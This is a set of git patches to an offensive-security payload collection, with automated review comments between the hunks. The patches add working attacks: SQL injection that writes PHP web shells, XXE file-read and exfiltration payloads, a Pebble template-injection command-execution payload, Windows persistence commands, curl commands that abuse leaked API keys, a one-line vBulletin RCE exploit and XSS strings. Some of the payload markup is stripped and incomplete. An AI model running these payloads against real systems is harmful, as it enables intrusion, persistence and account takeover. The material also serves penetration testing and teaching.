Exposure 
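Review bot: the JuicyPotato hunk in `Windows - Privilege Escalation.md` mixes tool output (`Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337`, `[+] authresult 0`, `[+] CreateProcessWithTokenW OK`) into the same `powershell` block as the three commands with nothing separating them, so a reader cannot tell what to type from what to expect; put the output after a blank line or a comment, or in its own block. It also drops the `# -l : local listener port` explanation the old lines had, and carries `c:\interpub\wwwroot\upload\nc.exe` into the first command, where the IIS default root is `c:\inetpub\wwwroot\`.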
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 2aa39306..6574bb05 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -24,6 +24,8 @@ * [MYSQL Current queries](#mysql-current-queries) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) * [MYSQL Write a shell](#mysql-write-a-shell) + * [Into outfile method](#into-outfile-method) + * [Into dumpfile method](#into-dumpfile-method) * [MYSQL UDF command execution](#mysql-udf-command-execution) * [MYSQL Truncation](#mysql-truncation) * [MYSQL Out of band](#mysql-out-of-band) @@ -293,14 +295,22 @@ GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;# ## MYSQL Write a shell +### Into outfile method + ```sql -SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" -SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' --1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' +[...] UNION SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" +[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '' [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- - [...] union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' ``` +### Into dumpfile method + +```sql +[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' +[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php'; +``` + ## MYSQL Truncation In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed. 
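Review bot: the first line of the new `Into dumpfile method` section in `MySQL Injection.md` still reads `INTO DUMPILE`, a typo for `INTO DUMPFILE` (the second line spells it correctly), so the example fails with a syntax error as written. Since the section now exists to show the hex-literal form, add a comment saying what the constants decode to: `0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e` is `<?php system($_GET['c']); ?>`, and `0x3c3f70687020706870696e666f28293b203f3e` in the outfile section is `<?php phpinfo(); ?>`. It would also help to say when to pick `DUMPFILE` over `OUTFILE`: `DUMPFILE` writes a single row verbatim without the line and field terminators that `OUTFILE` adds, which is why the outfile examples need `FIELDS TERMINATED BY`.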
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 1f0368a3..03183561 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -644,4 +644,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) -- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) \ No newline at end of file +- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) +- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) \ No newline at end of file diff --git a/XXE Injection/README.md b/XXE Injection/README.md index f3a3fafe..b69754cc 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
@@ -12,11 +12,16 @@ Syntax: `` - [Tools](#tools) - [Detect the vulnerability](#detect-the-vulnerability) -- [Read file content](#read-file-content) -- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) -- [XXE to SSRF](#xxe-to-ssrf) -- [Deny of service](#deny-of-service) -- [Blind XXE - Out of Band](#blind-xxe---out-of-Band) +- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files) + - [Classic XXE](#classic-xxe) + - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded) + - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) + - [XInclude attacks](#xinclude-attacks) +- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) +- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service) + - [Billion Laugh Attack](#billion-laugh-attack) +- [Error Based XXE](#error-based-xxe) +- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) @@ -53,9 +58,11 @@ Basic entity test, when the XML parser parses the external entities the result s It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. -## Read file content +## Exploiting XXE to retrieve files -Classic XXE, we try to display the content of the file `/etc/passwd` +### Classic XXE + +We try to display the content of the file `/etc/passwd` ```xml ]>&test; @@ -93,14 +100,13 @@ Classic XXE, we try to display the content of the file `/etc/passwd` ]>&xxe; ``` - -Classic XXE Base64 encoded +### Classic XXE Base64 encoded ```xml %init; ]> ``` -## PHP Wrapper inside XXE +### PHP Wrapper inside XXE ```xml ]> 
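Review bot: the new Summary entry `[Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)` keeps uppercase `SSRF` in the fragment; GitHub lowercases generated heading ids, so the link will not resolve (the removed `#blind-xxe---out-of-Band` entry had the same defect). Use `#exploiting-xxe-to-perform-ssrf-attacks`. "deny of service" in the heading `## Exploiting XXE to perform a deny of service` and its anchor should read "denial of service".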
@@ -124,7 +130,16 @@ Classic XXE Base64 encoded &xxe; ``` -## XXE to SSRF +### XInclude attacks + +When you can't modify the **DOCTYPE** element use the **XInclude** to target + +```xml + + +``` + +## Exploiting XXE to perform SSRF attacks XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network. @@ -132,17 +147,17 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo - + ]> &xxe; ``` -## Deny of service +## Exploiting XXE to perform a deny of service :warning: : These attacks might kill the service or the server, do not use them on the production. -Billion Laugh Attack +### Billion Laugh Attack ```xml &a4; ``` -Yaml attack +### Yaml attack ```xml a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] @@ -169,7 +184,30 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` -## Blind XXE - Out of Band + +## Error Based XXE + +**Payload to trigger the XXE** + +```xml + + + %ext; +]> + +``` + +**Contents of ext.dtd** +```xml + +"> +%eval; +%error; +``` + + +## Exploiting blind XXE to exfiltrate data out-of-band Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. 
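Review bot: the XInclude lead-in `When you can't modify the **DOCTYPE** element use the **XInclude** to target` stops mid-sentence and never says what is targeted or why XInclude helps when no DOCTYPE can be injected; finish it (e.g. "to include an external file"). In the "Error Based XXE" section, state that `ext.dtd` is an external DTD the parser fetches from a host you control, so the payload needs outgoing connectivity from the target; that is the precondition that separates it from the local DTD variant. The warning line `:warning: : These attacks might kill the service` has a doubled colon, and `### Billion Laugh Attack` should be "Billion Laughs".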
@@ -301,7 +339,7 @@ GIF (experimental) * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) * [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) * [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) -* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) +* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) * [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) * [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html) * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) @@ -312,3 +350,5 @@ GIF (experimental) * [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) +* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) +* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) \ No newline at end of file From 742e3204d3ddc2a521555acff02d8b6f3d9aeb52 Mon Sep 17 00:00:00 2001 
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 13 Sep 2019 17:38:23 +0200 Subject: [PATCH 052/222] SharpPersist - Windows Persistence --- JSON Web Token/README.md | 21 +++++++++- .../Windows - Persistence.md | 41 ++++++++++++++++++- 2 files changed, 60 insertions(+), 2 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index ccdb745b..a6fb0808 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -46,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). } ``` +| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements | +|---|---|---| +| HS256 | HMAC using SHA-256 | Required | +| HS384 | HMAC using SHA-384 | Optional | +| HS512 | HMAC using SHA-512 | Optional | +| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended | +| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional | +| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional | +| ES256 | ECDSA using P-256 and SHA-256 | Recommended | +| ES384 | ECDSA using P-384 and SHA-384 | Optional | +| ES512 | ECDSA using P-521 and SHA-512 | Optional | +| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional | +| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional | +| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional | +| none | No digital signature or MAC performed | Required | + + + ### Payload ```json 
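Review bot: the added `alg` table has no source, and its wording contradicts the context line above it, which calls HS256 "symmetric encryption" while the table describes it (correctly) as "HMAC using SHA-256", a MAC rather than encryption; fix the context line and cite the registry the table is taken from. The row `| none | No digital signature or MAC performed | Required |` needs a sentence saying that a verifier must reject tokens whose header claims `none`, because as written the "Requirements" column reads like a list of algorithms to support. Two stray blank lines follow the table.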
@@ -271,4 +289,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) -- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) \ No newline at end of file +- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index d8fa2cd3..d005bd8a 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -2,6 +2,7 @@ ## Summary +* [Tools](#tools) * [Userland](#userland) * [Registry](#registry) * [Startup](#startup) @@ -13,6 +14,10 @@ * [References](#references) +## Tools + +- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist) + ## Userland ### Registry 
@@ -24,6 +29,14 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add +``` + ### Startup Create a batch script in the user startup folder. @@ -33,6 +46,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add +``` + ### Scheduled Task ```powershell @@ -44,6 +63,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +Using SharPersist + +```powershell +# Add to a current scheduled task +SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add + +# Add new task +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly +``` + +## Windows Service + +Using SharPersist + +```powershell +SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add +``` + ## Elevated ### HKLM 
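Review bot: `## Windows Service` is added as an H2 between `### Scheduled Task` and `## Elevated`, so it appears as a top-level section beside Userland and Elevated rather than as a technique, and it is missing from the Summary list that this patch otherwise updates; creating a service requires administrative rights, so it belongs as `### Windows Service` under `## Elevated` with a matching Summary entry. Each "Using SharPersist" block would also benefit from one comment saying what `-o env` and `-o hourly` change, as the scheduled-task block already does for `schtaskbackdoor` versus `schtask`.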
@@ -79,4 +117,5 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) -* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) \ No newline at end of file +* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) +* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) \ No newline at end of file From e6f94af721cee62c445ed29780e28a9f38063011 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 13 Sep 2019 17:49:47 +0200 Subject: [PATCH 053/222] Update FUNDING.yml with buymeacoffee --- .github/FUNDING.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index 3c966688..8b5d40b6 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -2,3 +2,4 @@ github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] ko_fi: swissky # Replace with a single Ko-fi username +custom: https://www.buymeacoffee.com/swissky From a0917241ad687f6f9ec410295b7aefd9f4af5960 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 17 Sep 2019 15:43:13 +0200 Subject: [PATCH 054/222] Pebble - Server Side Template Injection --- Server Side Template Injection/README.md | 30 ++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 8de55ae5..1ac3ac95 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -22,6 +22,9 @@ * [Freemarker](#freemarker) * [Basic injection](#basic-injection) * [Code execution](#code-execution) +* [Peeble](#peeble) + * [Basic injection](#basic-injection) + * [Code execution](#code-execution) * [Jade / Codepen](#jade---codepen) * [Velocity](#velocity) * [Mako](#mako) @@ -37,6 +40,7 @@ * [Jinjava](#jinjava) * [Basic injection](#basic-injection) * [Command execution](#command-execution) +* [References](#references) ## Tools @@ -153,6 +157,31 @@ The template can be `${3*3}` or the legacy `#{3*3}` ${"freemarker.template.utility.Execute"?new()("id")} ``` +## Pebble + +### Basic injection + +```java +{{ someString.toUPPERCASE() }} +``` + +### Code execution + +```java +{% set cmd = 'id' %} +{% set bytes = (1).TYPE + .forName('java.lang.Runtime') + .methods[6] + .invoke(null,null) + .exec(cmd) + .inputStream + .readAllBytes() %} +{{ (1).TYPE + .forName('java.lang.String') + .constructors[0] + .newInstance(([bytes]).toArray()) }} +``` + ## Jade / Codepen ```python @@ -355,3 +384,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) +* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) \ No newline at end of file From 8822199f654c2b89ca71e682a9d380ba4eacb51f Mon Sep 17 00:00:00 2001 
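Review bot: the Summary entries spell the section `Peeble` with anchor `#peeble`, while the heading added below is `## Pebble`, so the link will not resolve. The two sub-entries reuse `#basic-injection` and `#code-execution`, which are already taken by the Freemarker section above, so they jump there instead; GitHub suffixes duplicate ids (`#basic-injection-1`). The fences are tagged ```java although the content is Pebble template syntax, not Java source.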
From: Techbrunch Date: Tue, 17 Sep 2019 16:23:14 +0200 Subject: [PATCH 055/222] Add XXE payload inside SVG Source: https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload --- XXE Injection/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b69754cc..378c8c29 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -298,6 +298,14 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) ``` +``` + + ]> + + &xxe; + +``` + ### XXE inside SOAP ```xml @@ -351,4 +359,4 @@ GIF (experimental) * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) -* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) \ No newline at end of file +* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) From 9a02958b511bd4f6e9f0c6a07edb81b805c9c7d3 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 22 Sep 2019 17:06:44 +0200 Subject: [PATCH 056/222] API Key Leaks - Twitter/Twilio/Gitlab --- API Key Leaks/README.md | 93 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 API Key Leaks/README.md diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md new file mode 100644 index 00000000..5814842c --- /dev/null +++ b/API Key Leaks/README.md 
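Review bot: the new SVG block is fenced with a bare ``` while the neighbouring blocks in this file use ```xml; tag it for consistent highlighting. It also lands between the Jboss text and `### XXE inside SOAP` with no lead-in, so add a one-line caption (e.g. "XXE inside SVG via file upload") and cite the PortSwigger lab named in the commit message as its source, as the other payloads in this file do.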
@@ -0,0 +1,93 @@ +# API Key Leaks + +> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developpers might hardcode them or leave it on public shares. + +## Summary + +- [Tools](#tools) +- [Exploit](#exploit) + - [Algolia](#algolia) + - [AWS Access Key ID & Secret](#aws-access-key-id-secret) + - [Slack API Token](#slack-api-token) + - [Facebook Access Token](#facebook-access-token) + - [Github client id and client secret](#github-client-id-and-client-secret) + - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token) + - [Twitter API Secret](#twitter-api-secret) + - [Twitter Bearer Token](#twitter-bearer-token) + - [Gitlab Personal Access Token](#gitlab-personnal-access-token) + +## Tools + +- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) +- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) + +## Exploit + +The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token. + +### Algolia + +```powershell +curl --request PUT \ + --url https://-1.algolianet.com/1/indexes//settings \ + --header 'content-type: application/json' \ + --header 'x-algolia-api-key: ' \ + --header 'x-algolia-application-id: ' \ + --data '{"highlightPreTag": ""}' +``` + +### AWS Access Key ID & Secret + +```powershell +git clone https://github.com/andresriancho/enumerate-iam +cd enumerate-iam +./enumerate-iam.py --access-key AKIA... --secret-key XXX.. 
+``` + +### Slack API Token + +```powershell +curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1" +``` + +### Facebook Access Token + +```powershell +curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2 +``` + +### Github client id and client secret + +```powershell +curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy' +``` + +### Twilio Account_sid and Auth token + +```powershell +curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN +``` + +### Twitter API Secret + +```powershell +curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token' +``` + +### Twitter Bearer Token + +```powershell +curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN' +``` + +### Gitlab Personal Access Token + +```powershell +curl "https://gitlab.example.com/api/v4/projects?private_token=" +``` + + +## References + +* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) +* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) \ No newline at end of file From 3221197b1ef9328ece13fc1d5e4369e04faa5f83 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 26 Sep 2019 20:41:01 +0200 Subject: [PATCH 057/222] RCE vBulletin + findomain --- CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh | 1 + Insecure Deserialization/README.md | 3 ++- Methodology and Resources/Subdomains Enumeration.md | 12 ++++++++++++ XSS Injection/README.md | 2 ++ 4 files changed, 17 insertions(+), 1 deletion(-) create mode 100644 CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh 
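Review bot: in the new API Key Leaks page the Summary anchor `#gitlab-personnal-access-token` (double n) does not match the heading `### Gitlab Personal Access Token`, and `#aws-access-key-id-secret` will not match `### AWS Access Key ID & Secret` either (GitHub drops the `&` but keeps both surrounding spaces, giving `#aws-access-key-id--secret`). Spelling: "developpers", "personnal informations" (should be "developers", "personal information"). Every block is fenced ```powershell although the commands are curl and git invocations for a POSIX shell; ```bash fits.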
diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh new file mode 100644 index 00000000..3ebf64a2 --- /dev/null +++ b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh @@ -0,0 +1 @@ +curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" \ No newline at end of file diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 4a0ed0fb..aa058259 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -24,4 +24,5 @@ Check the following sub-sections, located in other files : * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) -* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals \ No newline at end of file +* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals +* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) \ No newline at end of file diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index 0806a99a..88ee0e20 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -9,6 +9,7 @@ * EyeWitness * Sublist3r * Subfinder + * Findomain * Aquatone (Ruby and Go versions) * AltDNS * MassDNS 
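Review bot: the new file `CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh` is a single `curl` line with no shebang, a hardcoded `https://example.com` and no CVE identifier or source advisory anywhere in the file; add `#!/bin/sh`, take the target URL as `$1`, and put the CVE number and source in a comment so the file is searchable and reviewable. The Insecure Deserialization reference `Sep 19- Vickie Li` is missing a space after the hyphen.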
@@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ``` +### Using Findomain + +```powershell +$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux +$ chmod +x findomain-linux +$ findomain_spyse_token="YourAccessToken" +$ findomain_virustotal_token="YourAccessToken" +$ findomain_fb_token="YourAccessToken" +$ ./findomain-linux -t example.com -o +``` + ### Using Aquatone - old version (Ruby) ```powershell diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6bd8aa15..a0ccd8af 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -751,6 +751,8 @@ You don't need to close your tags. ```javascript %26%2397;lert(1) +alert +> ``` ### Bypass using Katana From 3fb2a9006ff4ee3cb0f294f6bbe179819d5cc92f Mon Sep 17 00:00:00 2001 From: Mark <55981308+Luci-d@users.noreply.github.com> Date: Mon, 30 Sep 2019 15:26:26 +0400 Subject: [PATCH 058/222] Add Spyse to network discovery 1. spyse itself 2. python wrapper - using only a part of the available functionality of spyse, but will be updated very soon. --- .../Network Discovery.md | 30 ++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index 10a6b63e..bf050ed0 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -3,6 +3,7 @@ ## Summary - [Nmap](#nmap) +- [Spyse](#spyse) - [Masscan](#masscan) - [Netdiscover](#netdiscover) - [Responder](#responder) 
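Review bot: in the Findomain block the token variables are assigned without `export` (`$ findomain_spyse_token="YourAccessToken"` and the two lines after it), so as written they are shell-local and never reach the `./findomain-linux` child process; prefix them with `export`. The `$` prompts inside a ```powershell fence are also misleading for commands meant for a Linux shell. In the XSS Katana hunk, the added `alert` and `>` lines are not a complete payload as shown; check that the markup survived.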
